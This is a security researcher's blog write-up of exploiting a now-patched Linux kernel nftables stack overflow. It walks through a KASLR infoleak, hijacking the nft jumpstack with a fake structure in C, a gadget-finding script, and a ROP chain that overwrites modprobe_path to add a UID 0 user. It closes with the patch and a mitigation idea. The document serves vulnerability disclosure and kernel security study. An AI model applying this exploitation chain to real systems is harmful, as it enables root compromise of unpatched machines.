64 bytes and a ROP chain – A journey through nftables – Part 2

In my previous blog post, we discussed the vulnerability research and validation process. Now, let’s get to the exploitation of a stack overflow in the interrupt context by dividing it into two main parts: defeating KASLR and privilege escalation.

1. Getting an infoleak

Can I turn this bug into something useful? At this point I somewhat had an idea that would allow me to leak some data, although I wasn’t sure what kind of data would have come out of the stack.
The idea was to overflow into the first NFT register (NFT_REG32_00) so that all the remaining ones would contain the mysterious data. It also wasn’t clear to me how to extract this leak in the first place, when I vaguely remembered about the existence of the nft_dynset expression from CVE-2022-1015, which inserts key:data pairs into a hashmap-like data structure (which is actually an nft_set) that can be later fetched from userland. Since we can add registers to the dynset, we can reference them like so:
key[i] = NFT_REG32_i, value[i] = NFT_REG32_(i+8)
This solution should allow avoiding duplicate keys, but we should still check that all key registers contain different values, otherwise we will lose their values.

1.1 Returning the registers

Having a programmatic way to read the content of a set would be best in this case, Randorisec accomplished the same task in their CVE-2022-1972 infoleak exploit, where they send a netlink message of the NFT_MSG_GETSET type and parse the received message from an iovec.
Although this technique seems to be the most straightforward one, I went for an easier one which required some unnecessary bash scripting.
Therefore, I decided to employ the nft utility (from the nftables package) which carries out all the parsing for us.

If I wanted to improve this part, I would definitely parse the netlink response without the external dependency of the nft binary, which makes it less elegant and much slower.

After overflowing, we can run the following command to retrieve all elements of the specified map belonging to a netdev table:

$ nft list map netdev {table_name} {set_name}

table netdev mytable {
	map myset12 {
		type 0x0 [invalid type] : 0x0 [invalid type]
		size 65535
		elements = { 0x0 [invalid type] : 0x0 [invalid type],
			     0x5810000 [invalid type] : 0xc9ffff30 [invalid type],
			     0xbccb410 [invalid type] : 0x88ffff10 [invalid type],
			     0x3a000000 [invalid type] : 0xcfc281ff [invalid type],
			     0x596c405f [invalid type] : 0x7c630680 [invalid type],
			     0x78630680 [invalid type] : 0x3d000000 [invalid type],
			     0x88ffff08 [invalid type] : 0xc9ffffe0 [invalid type],
			     0x88ffffe0 [invalid type] : 0xc9ffffa1 [invalid type],
			     0xc9ffffa1 [invalid type] : 0xcfc281ff [invalid type] }
	}
}

1.2 Understanding the registers

Seeing all those ffff was already a good sign, but let’s review the different kernel addresses we could run into (this might change due to ASLR and other factors):

  • .TEXT (code) section addresses: 0xffffffff8[1-3]……
  • Stack addresses: 0xffffc9……….
  • Heap addresses: 0xffff8880……..

We can ask gdb for a second opinion to see if we actually spotted any of them:

gef➤ p &regs 
$12 = (struct nft_regs *) 0xffffc90000003ae0
gef➤ x/12gx 0xffffc90000003ad3
0xffffc90000003ad3:    0x0ce92fffffc90000    0xffffffffffffff81
Oxffffc90000003ae3:    0x071d0000000000ff    0x008105ffff888004
0xffffc90000003af3:    0xb4cc0b5f406c5900    0xffff888006637810    <==
0xffffc90000003b03:    0xffff888006637808    0xffffc90000003ae0    <==
0xffffc90000003b13:    0xffff888006637c30    0xffffc90000003d10
0xffffc90000003b23:    0xffffc90000003ce0    0xffffffff81c2cfa1    <==

Looks like a stack canary is present at address 0xffffc90000003af3, which could be useful later when overwriting one of the saved instruction pointers on the stack but, moreover, we can see an instruction address (0xffffffff81c2cfa1) and the regs variable reference itself (0xffffc90000003ae0)!
Gdb also tells us that the instruction belongs to the nft_do_chain routine:

gef➤ x/i 0xffffffff81c2cfa1
0xffffffff81c2cfa1 <nft_do_chain+897>:    jmp    0xffffffff81c2cda7 <nft_do_chain+391>

Based on that information I could use the address in green to calculate the KASLR slide by pulling it out of a KASLR-enabled system and subtracting them.

Since it would be too inconvenient to reassemble these addresses manually, we could select the NFT registers containing the interesting data and add them to the set, leading to the following result:

table netdev {table_name} {
	map {set_name} {
		type 0x0 [invalid type] : 0x0 [invalid type]
		size 65535
		elements = { 0x88ffffe0 [invalid type] : 0x3a000000 [invalid type],     <== (1)
			           0xc9ffffa1 [invalid type] : 0xcfc281ff [invalid type] }    <== (2)   
	}
}

From the output we could clearly discern the shuffled regs (1) and nft_do_chain (2) addresses.
To explain how this infoleak works, I had to map out the stack layout at the time of the overflow, as it stays the same upon different nft_do_chain runs.

The regs struct is initialized with zeros at the beginning of nft_do_chain, and is immediately followed by the nft_jumpstack struct, containing the list of rules to be evaluated on the next nft_do_chain call, in a stack-like format (LIFO).

The vulnerable memcpy source is evaluated from the vlanh pointer referring to the struct vlan_ethhdr veth local variable, which resides in the nft_payload_eval stack frame, since nft_payload_copy_vlan is inlined by the compiler.
The copy operation therefore looks something like the following:

post-overflow
State of the stack post-overflow

The red zones represent memory areas that have been corrupted with mostly unpredictable data, whereas the yellow ones are also partially controlled when pointing dst_u8 to the first register. The NFT registers are thus overwritten with data belonging to the nft_payload_eval stack frame, including the respective stack cookie and return address.

2. Elevating the tables

With a pretty solid infoleak at hand, it was time to move on to the memory corruption part.
While I was writing the initial vuln report, I tried switching the exploit register to the highest possible one (NFT_REG32_15) to see what would happen.

Surprisingly, I couldn’t reach the return address, indicating that a classic stack smashing scenario wasn’t an option. After a closer look, I noticed a substantially large structure, nft_jumpstack, which is 16*24 bytes long, absorbing the whole overflow.

2.1 Jumping between the stacks

The jumpstack structure I introduced in the previous section keeps track of the rules that have yet to be evaluated in the previous chains that have issued an NFT_JUMP verdict.

  • When the rule ruleA_1 in chainA desires to transfer the execution to another chain, chainB, it issues the NFT_JUMP verdict.
  • The next rule in chainA, ruleA_2, is stored in the jumpstack at the stackptr index, which keeps track of the depth of the call stack.
  • This is intended to restore the execution of ruleA_2 as soon as chainB has returned via the NFT_CONTINUE or NFT_RETURN verdicts.

This aspect of the nftables state machine isn’t that far from function stack frames, where the return address is pushed by the caller and then popped by the callee to resume execution from where it stopped.

While we can’t reach the return address, we can still hijack the program’s control flow by corrupting the next rule to be evaluated!

In order to corrupt as much regs-adjacent data as possible, the destination register should be changed to the last one, so that it’s clear how deep into the jumpstack the overflow goes.
After filling all registers with placeholder values and triggering the overflow, this was the result:

gef➤  p jumpstack
$334 = {{
    chain = 0x1017ba2583d7778c,         <== vlan_ethhdr data
    rule = 0x8ffff888004f11a,
    last_rule = 0x50ffff888004f118
  }, {
    chain = 0x40ffffc900000e09,
    rule = 0x60ffff888004f11a,
    last_rule = 0x50ffffc900000e0b
  }, {
    chain = 0xc2ffffc900000e0b,
    rule = 0x1ffffffff81d6cd,
    last_rule = 0xffffc9000f4000
  }, {
    chain = 0x50ffff88807dd21e,
    rule = 0x86ffff8880050e3e,
    last_rule = 0x8000000001000002      <== random data from the stack
  }, {
    chain = 0x40ffff88800478fb,
    rule = 0xffff888004f11a,
    last_rule = 0x8017ba2583d7778c
  }, {
    chain = 0xffff88807dd327,
    rule = 0xa9ffff888004764e,
    last_rule = 0x50000000ef7ad4a
  }, {
    chain = 0x0 ,
    rule = 0xff00000000000000,
    last_rule = 0x8000000000ffffff
  }, {
    chain = 0x41ffff88800478fb,
    rule = 0x4242424242424242,         <== regs are copied here: full control over rule and last_rule
    last_rule = 0x4343434343434343
  }, {
    chain = 0x4141414141414141,
    rule = 0x4141414141414141,
    last_rule = 0x4141414141414141
  }, {
    chain = 0x4141414141414141,
    rule = 0x4141414141414141,
    last_rule = 0x8c00008112414141

The copy operation has a big enough size to include the whole regs buffer in the source, this means that we can partially control the jumpstack!
The gef output shows how only the end of our 251-byte overflow is controllable and, if aligned correctly, it can overwrite the 8th and 9th rule and last_rule pointers.
To confirm that we are breaking something, we could just jump to 9 consecutive chains, and when evaluating the last one trigger the overflow and hopefully jump to jumpstack[8].rule:
As expected, we get a protection fault:

[ 1849.727034] general protection fault, probably for non-canonical address 0x4242424242424242: 0000 [#1] PREEMPT SMP NOPTI
[ 1849.727034] CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.2.0-rc1 #5
[ 1849.727034] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 1849.727034] RIP: 0010:nft_do_chain+0xc1/0x740
[ 1849.727034] Code: 40 08 48 8b 38 4c 8d 60 08 4c 01 e7 48 89 bd c8 fd ff ff c7 85 00 fe ff ff ff ff ff ff 4c 3b a5 c8 fd ff ff 0f 83 4
[ 1849.727034] RSP: 0018:ffffc900000e08f0 EFLAGS: 00000297
[ 1849.727034] RAX: 4343434343434343 RBX: 0000000000000007 RCX: 0000000000000000
[ 1849.727034] RDX: 00000000ffffffff RSI: ffff888005153a38 RDI: ffffc900000e0960
[ 1849.727034] RBP: ffffc900000e0b50 R08: ffffc900000e0950 R09: 0000000000000009
[ 1849.727034] R10: 0000000000000017 R11: 0000000000000009 R12: 4242424242424242
[ 1849.727034] R13: ffffc900000e0950 R14: ffff888005153a40 R15: ffffc900000e0b60
[ 1849.727034] FS: 0000000000000000(0000) GS:ffff88807dd00000(0000) knlGS:0000000000000000
[ 1849.727034] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1849.727034] CR2: 000055e3168e4078 CR3: 0000000003210000 CR4: 00000000000006e0

Let’s explore the nft_do_chain routine to understand what happened:

/* net/netfilter/nf_tables_core.c */

unsigned int nft_do_chain(struct nft_pktinfo *pkt, void *priv) {
	const struct nft_chain *chain = priv, *basechain = chain;
	const struct nft_rule_dp *rule, *last_rule;
	const struct net *net = nft_net(pkt);
	const struct nft_expr *expr, *last;
	struct nft_regs regs = {};
	unsigned int stackptr = 0;
	struct nft_jumpstack jumpstack[NFT_JUMP_STACK_SIZE];
	bool genbit = READ_ONCE(net->nft.gencursor);
	struct nft_rule_blob *blob;
	struct nft_traceinfo info;

	info.trace = false;
	if (static_branch_unlikely(&nft_trace_enabled))
		nft_trace_init(&info, pkt, &regs.verdict, basechain);
do_chain:
	if (genbit)
		blob = rcu_dereference(chain->blob_gen_1);       // Get correct chain generation
	else
		blob = rcu_dereference(chain->blob_gen_0);

	rule = (struct nft_rule_dp *)blob->data;          // Get fist and last rules in chain
	last_rule = (void *)blob->data + blob->size;
next_rule:
	regs.verdict.code = NFT_CONTINUE;
	for (; rule < last_rule; rule = nft_rule_next(rule)) {   // 3. for each rule in chain
		nft_rule_dp_for_each_expr(expr, last, rule) {    // 4. for each expr in rule
			...
			expr_call_ops_eval(expr, &regs, pkt);    // 5. expr->ops->eval()

			if (regs.verdict.code != NFT_CONTINUE)
				break;
		}

		...
		break;
	}

	...
switch (regs.verdict.code) {
	case NFT_JUMP:
		/*
			1. If we're jumping to the next chain, store a pointer to the next rule of the 
      current chain in the jumpstack, increase the stack pointer and switch chain
		*/
		if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))
			return NF_DROP;	
		jumpstack[stackptr].chain = chain;
		jumpstack[stackptr].rule = nft_rule_next(rule);
		jumpstack[stackptr].last_rule = last_rule;
		stackptr++;
		fallthrough;
	case NFT_GOTO:
		chain = regs.verdict.chain;
		goto do_chain;
	case NFT_CONTINUE:
	case NFT_RETURN:
		break;
	default:
		WARN_ON_ONCE(1);
	}
	/*
		2. If we got here then we completed the latest chain and can now evaluate
		the next rule in the previous one
	*/
	if (stackptr > 0) {
		stackptr--;
		chain = jumpstack[stackptr].chain;
		rule = jumpstack[stackptr].rule;
		last_rule = jumpstack[stackptr].last_rule;
		goto next_rule;
	}
		...

The first 8 jumps fall into case 1. where the NFT_JUMP verdict increases stackptr to align it with our controlled elements, then, on the 9th jump, we overwrite the 8th element containing the next rule and return from the current chain landing on the corrupted one. At 2. the stack pointer is decremented and control is returned to the previous chain.
Finally, the next rule in chain 8 gets dereferenced at 3: nft_rule_next(rule), too bad we just filled it with 0x42s, causing the protection fault.

2.2 Controlling the execution flow

Other than the rule itself, there are other pointers that should be taken care of to prevent the kernel from crashing, especially the ones dereferenced by nft_rule_dp_for_each_expr when looping through all rule expressions:

/* net/netfilter/nf_tables_core.c */

#define nft_rule_expr_first(rule)	(struct nft_expr *)&rule->data[0]
#define nft_rule_expr_next(expr)	((void *)expr) + expr->ops->size
#define nft_rule_expr_last(rule)	(struct nft_expr *)&rule->data[rule->dlen]
#define nft_rule_next(rule)		(void *)rule + sizeof(*rule) + rule->dlen

#define nft_rule_dp_for_each_expr(expr, last, rule) \
        for ((expr) = nft_rule_expr_first(rule), (last) = nft_rule_expr_last(rule); \
             (expr) != (last); \
             (expr) = nft_rule_expr_next(expr))
  1. nft_do_chain requires rule to be smaller than last_rule to enter the outer loop. This is not an issue as we control both fields in the 8th element. Furthermore, rule will point to another address in the jumpstack we control as to reference valid memory.
  2. nft_rule_dp_for_each_expr thus calls nft_rule_expr_first(rule) to get the first expr from its data buffer, 8 bytes after rule. We can discard the result of nft_rule_expr_last(rule) since it won’t be dereferenced during the attack.
    (remote) gef➤ p (int)&((struct nft_rule_dp *)0)->data
    $29 = 0x8
    (remote) gef➤ p *(struct nft_expr *) rule->data
    $30 = {
      ops = 0xffffffff82328780,
      data = 0xffff888003788a38 "1374\377\377\377"
    }
    (remote) gef➤ x/101 0xffffffff81a4fbdf
    => 0xffffffff81a4fbdf <nft_do_chain+143>:   cmp   r12,rbp
    0xffffffff81a4fbe2 <nft_do_chain+146>:      jae   0xffffffff81a4feaf
    0xffffffff81a4fbe8 <nft_do_chain+152>:      movz  eax,WORD PTR [r12]                  <== load rule into eax
    0xffffffff81a4fbed <nft_do_chain+157>:      lea   rbx,[r12+0x8]                       <== load expr into rbx
    0xffffffff81a4fbf2 <nft_do_chain+162>:      shr   ax,1
    0xffffffff81a4fbf5 <nft_do_chain+165>:      and   eax,0xfff
    0xffffffff81a4fbfa <nft_do_chain+170>:      lea   r13,[r12+rax*1+0x8]
    0xffffffff81a4fbff <nft_do_chain+175>:      cmp   rbx,r13
    0xffffffff81a4fc02 <nft_do_chain+178>:      jne   0xffffffff81a4fce5 <nft_do_chain+405>
    0xffffffff81a4fc08 <nft_do_chain+184>:      jmp   0xffffffff81a4fed9 <nft_do_chain+905>
    
  3. nft_do_chain calls expr->ops->eval(expr, regs, pkt); via expr_call_ops_eval(expr, &regs, pkt), so the dereference chain has to be valid and point to executable memory. Fortunately, all fields are at offset 0, so we can just place the expr, ops and eval pointers all next to each other to simplify the layout.
    (remote) gef➤ x/4i 0xffffffff81a4fcdf
    0xffffffff81a4fcdf <nft_do_chain+399>:      je    0xffffffff81a4feef <nft_do_chain+927>
    0xffffffff81a4fce5 <nft_do_chain+405>:      mov   rax,QWORD PTR [rbx]                <== first QWORD at expr is expr->ops, store it into rax
    0xffffffff81a4fce8 <nft_do_chain+408>:      cmp   rax,0xffffffff82328900 
    => 0xffffffff81a4fcee <nft_do_chain+414>:   jne   0xffffffff81a4fc0d <nft_do_chain+189>
    (remote) gef➤ x/gx $rax
    0xffffffff82328780 :    0xffffffff81a65410
    (remote) gef➤ x/4i 0xffffffff81a65410
    0xffffffff81a65410 <nft_immediate_eval>:    movzx eax,BYTE PTR [rdi+0x18]            <== first QWORD at expr->ops points to expr->ops->eval
    0xffffffff81a65414 <nft_immediate_eval+4>:  movzx ecx,BYTE PTR [rdi+0x19]
    0xffffffff81a65418 <nft_immediate_eval+8>:  mov   r8,rsi
    0xffffffff81a6541b <nft_immediate_eval+11>: lea   rsi,[rdi+0x8]
    

In order to preserve as much space as possible, the layout for stack pivoting can be arranged inside the registers before the overflow. Since these values will be copied inside the jumpstack, we have enough time to perform the following steps:

  1. Setup a stack pivot payload to NFT_REG32_00 by repeatedly invoking nft_rule_immediate expressions as shown above. Remember that we had leaked the regs address.
  2. Add the vulnerable nft_rule_payload expression that will later overflow the jumpstack with the previously added registers.
  3. Refill the registers with a ROP chain to elevate privileges with nft_rule_immediate.
  4. Trigger the overflow: code execution will start from the jumpstack and then pivot to the ROP chain starting from NFT_REG32_00.

By following these steps we managed to store the eval pointer and the stack pivot routine on the jumpstack, which would’ve otherwise filled up the regs too quickly.
In fact, without this optimization, the required space would be:
8 (rule) + 8 (expr) + 8 (eval) + 64 (ROP chain) = 88 bytes
Unfortunately, the regs buffer can only hold 64 bytes.

By applying the described technique we can reduce it to:

  • jumpstack: 8 (rule) + 8 (expr) + 8 (eval) = 24 bytes
  • regs: 64 bytes (ROP chain) which will fit perfectly in the available space.

Here is how I crafted the fake jumpstack to achieve initial code execution:

struct jumpstack_t fill_jumpstack(unsigned long regs, unsigned long kaslr) 
{
    struct jumpstack_t jumpstack = {0};
    /*
        align payload to rule
    */
    jumpstack.init = 'A';
    /*
        rule->expr will skip 8 bytes, here we basically point rule to itself + 8
    */
    jumpstack.rule =  regs + 0xf0;
    jumpstack.last_rule = 0xffffffffffffffff;
    /*
        point expr to itself + 8 so that eval() will be the next pointer
    */
    jumpstack.expr = regs + 0x100;
    /*
        we're inside nft_do_chain and regs is declared in the same function,
        finding the offset should be trivial: 
        stack_pivot = &NFT_REG32_00 - RSP
        the pivot will add 0x48 to RSP and pop 3 more registers, totaling 0x60
    */
    jumpstack.pivot = 0xffffffff810280ae + kaslr;
    unsigned char pad[31] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    strcpy(jumpstack.pad, pad);
    return jumpstack;
}

2.3 Getting UID 0

The next steps consist in finding the right gadgets to build up the ROP chain and make the exploit as stable as possible.

There exist several tools to scan for ROP gadgets, but I found that most of them couldn’t deal with large images too well. Furthermore, for some reason, only ROPgadget manages to find all the stack pivots in function epilogues, even if it prints them as static offset. Out of laziness, I scripted my own gadget finder based on objdump, that would be useful for short relative pivots (rsp + small offset):

#!/bin/bash

objdump -j .text -M intel -d linux-6.1.6/vmlinux > obj.dump
grep -n '48 83 c4 30' obj.dump | while IFS=":" read -r line_num line; do
        ret_line_num=$((line_num + 7))
        if [[ $(awk "NR==$ret_line_num" obj.dump | grep ret) =~ ret ]]; then
                out=$(awk "NR>=$line_num && NR<=$ret_line_num" obj.dump)
                if [[ ! $out == *"mov"* ]]; then
                        echo "$out"
                        echo -e "\n-----------------------------"
                fi
        fi
done

In this example case we’re looking to increase rsp by 0x60, and our script will find all stack cleanup routines incrementing it by 0x30 and then popping 6 more registers to reach the desired offset:

ffffffff8104ba47:    48 83 c4 30       add гsp, 0x30
ffffffff8104ba4b:    5b                pop rbx
ffffffff8104ba4c:    5d                pop rbp
ffffffff8104ba4d:    41 5c             pop r12
ffffffff8104ba4f:    41 5d             pop г13
ffffffff8104ba51:    41 5e             pop r14
ffffffff8104ba53:    41 5f             pop r15
ffffffff8104ba55:    e9 a6 78 fb 00    jmp ffffffff82003300 <____x86_return_thunk>

Even though it seems to be calling a jmp, gdb can confirm that we’re indeed returning to the saved rip via ret:

(remote) gef➤ x/10i 0xffffffff8104ba47
0xffffffff8104ba47 <set_cpu_sibling_map+1255>:    add   rsp,0x30
0xffffffff8104ba4b <set_cpu_sibling_map+1259>:    pop   rbx
0xffffffff8104ba4c <set_cpu_sibling_map+1260>:    pop   rbp
0xffffffff8104ba4d <set_cpu_sibling_map+1261>:    pop   r12
0xffffffff8104ba4f <set_cpu_sibling_map+1263>:    pop   r13
0xffffffff8104ba51 <set_cpu_sibling_map+1265>:    pop   r14
0xffffffff8104ba53 <set_cpu_sibling_map+1267>:    pop   r15
0xffffffff8104ba55 <set_cpu_sibling_map+1269>:    ret

Of course, the script can be adjusted to look for different gadgets.

Now, as for the privesc itself, I went for the most convenient and simplest approach, that is overwriting the modprobe_path variable to run a userland binary as root. Since this technique is widely known, I’ll just leave an in-depth analysis here:
We’re assuming that STATIC_USERMODEHELPER is disabled.

In short, the payload does the following:

  1. pop rax; ret : Set rax = /tmp/runme where runme is the executable that modprobe will run as root when trying to find the right module for the specified binary header.
  2. pop rdi; ret: Set rdi = &modprobe_path, this is just the memory location for the modprobe_path global variable.
  3. mov qword ptr [rdi], rax; ret: Perform the copy operation.
  4. mov rsp, rbp; pop rbp; ret: Return to userland.

While the first three gadgets are pretty straightforward and common to find, the last one requires some caution. Normally a kernel exploit would switch context by calling the so-called KPTI trampoline swapgs_restore_regs_and_return_to_usermode, a special routine that swaps the page tables and the required registers back to the userland ones by executing the swapgs and iretq instructions.
In our case, since the ROP chain is running in the softirq context, I’m not sure if using the same method would have worked reliably, it’d probably just be better to first return to the syscall context and then run our code from userland.

Here is the stack frame from the ROP chain execution context:

gef➤ bt
#0 nft_payload_eval (expr=0xffff888805e769f0, regs=0xffffc90000083950, pkt=0xffffc90000883689) at net/netfilter/nft_payload.c:124
#1 0xffffffff81c2cfa1 in expr_call_ops_eval (pkt=0xffffc90000083b80, regs=0xffffc90000083950, expr=0xffff888005e769f0)
#2 nft_do_chain (pkt=pkt@entry=0xffffc90000083b80, priv=priv@entry=0xffff888005f42a50) at net/netfilter/nf_tables_core.c:264
#3 0xffffffff81c43b14 in nft_do_chain_netdev (priv=0xffff888805f42a50, skb=, state=)
#4 0xffffffff81c27df8 in nf_hook_entry_hookfn (state=0xffffc90000083c50, skb=0xffff888005f4a200, entry=0xffff88880591cd88)
#5 nf_hook_slow (skb=skb@entry=0xffff888005f4a200, state-state@entry=0xffffc90808083c50, e=e@entry=0xffff88800591cd00, s=s@entry=0...
#6 0xffffffff81b7abf7 in nf_hook_ingress (skb=) at ./include/linux/netfilter_netdev.h:34
#7 nf_ingress (orig_dev=0xffff888005ff0000, ret=, pt_prev=, skb=) at net/core,
#8 ___netif_receive_skb_core (pskb=pskb@entry=0xffffc90000083cd0, pfmemalloc=pfmemalloc@entry=0x0, ppt_prev=ppt_prev@entry=0xffffc9...
#9 0xffffffff81b7b0ef in _netif_receive_skb_one_core (skb=, pfmemalloc=pfmemalloc@entry=0x0) at net/core/dev.c:548
#10 0xffffffff81b7b1a5 in ___netif_receive_skb (skb=) at net/core/dev.c:5603
#11 0xffffffff81b7b40a in process_backlog (napi=0xffff888007a335d0, quota=0x40) at net/core/dev.c:5931
#12 0xffffffff81b7c013 in ___napi_poll (n=n@entry=0xffff888007a335d0, repoll=repoll@entry=0xffffc90000083daf) at net/core/dev.c:6498
#13 0xffffffff81b7c493 in napi_poll (repoll=0xffffc90000083dc0, n=0xffff888007a335d0) at net/core/dev.c:6565
#14 net_rx_action (h=) at net/core/dev.c:6676
#15 0xffffffff82280135 in ___do_softirq () at kernel/softirq.c:574

Any function between the last corrupted one and __do_softirq would work to exit gracefully. To simulate the end of the current chain evaluation we can just return to nf_hook_slow since we know the location of its rbp.

Yes, we should also disable maskable interrupts via a cli; ret gadget, but we wouldn’t have enough space, and besides, we will be discarding the network interface right after.

To prevent any deadlocks and random crashes caused by skipping over the nft_do_chain function, a NFT_MSG_DELTABLE message is immediately sent to flush all nftables structures and we quickly exit the program to disable the network interface connected to the new network namespace.
Therefore, gadget 4 just pops nft_do_chain’s rbp and runs a clean leave; ret, this way we don’t have to worry about forcefully switching context.
As soon as execution is handed back to userland, a file with an unknown header is executed to trigger the executable under modprobe_path that will add a new user with UID 0 to /etc/passwd.

While this is in no way a data-only exploit, notice how the entire exploit chain lives inside kernel memory, this is crucial to bypass mitigations:

  • KPTI requires page tables to be swapped to the userland ones while switching context, __do_softirq will take care of that.
  • SMEP/SMAP prevent us from reading, writing and executing code from userland while in kernel mode. Writing the whole ROP chain in kernel memory that we control allows us to fully bypass those measures as well.

3. Patching the tables

Patching this vulnerability is trivial, and the most straightforward change has been approved by Linux developers:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
			return false;

		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;

		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

While this fix is valid, I believe that simplifying the whole expression would have been better:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
			return false;

		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen = VLAN_ETH_HLEN + vlan_hlen - offset;

		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

since ethlen is initialized with len and is never updated.

The vulnerability existed since Linux v5.5-rc1 and has been patched with commit 696e1a48b1a1b01edad542a1ef293665864a4dd0 in Linux v6.2-rc5.

One possible approach to making this vulnerability class harder to exploit involves using the same randomization logic as the one in the kernel stack (aka per-syscall kernel-stack offset randomization): by randomizing the whole kernel stack on each syscall entry, any KASLR leak is only valid for a single attempt. This security measure isn’t applied when entering the softirq context as a new stack is allocated for those operations at a static address.

You can find the PoC with its kernel config on my Github profile. The exploit has purposefully been built with only a specific kernel version in mind, as to make it harder to use it for illicit purposes. Adapting it to another kernel would require the following steps:

  • Reshaping the kernel leak from the nft registers,
  • Finding the offsets of the new symbols,
  • Calculating the stack pivot length
  • etc.

In the end this was just a side project, but I’m glad I was able to push through the initial discomforts as the final result is something I am really proud of. I highly suggest anyone interested in kernel security and CTFs to spend some time auditing the Linux kernel to make our OSs more secure and also to have some fun!
I’m writing this article one year after the 0-day discovery, so I expect there to be some inconsistencies or mistakes, please let me know if you spot any.

I want to thank everyone who allowed me to delve into this research with no clear objective in mind, especially my team @ Betrusted and the HackInTheBox crew for inviting me to present my experience in front of so many great people! If you’re interested, you can watch my presentation here:

Condividi l'articolo

Come possiamo aiutare la tua azienda?

Contattaci e troveremo insieme le soluzioni più adatte per affrontare le sfide che ogni giorno la tua impresa è chiamata ad affrontare.

    * campi obbligatori